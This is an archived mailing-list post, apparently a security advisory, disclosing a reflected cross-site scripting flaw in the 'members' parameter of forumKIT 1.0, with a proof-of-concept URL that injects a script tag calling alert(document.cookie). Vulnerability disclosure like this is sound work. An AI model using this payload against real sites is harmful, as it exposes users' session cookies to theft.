<<< Date Index >>>     <<< Thread Index >>>

XSS Vulnerability in ForumKIT




Vulnerable System :
forumKIT 1.0

Description : 
an XSS is founded in the variable members that have the value 'true'
you can exchange it with XSS Code .

exploit : 
http://forum.target.com/f.aspx?members=";>&lt;script&gt;alert(document.cookie);&lt;/script&gt;

this exploit is discovered by : neO
e-mail : al_modamer@xxxxxxxxxxx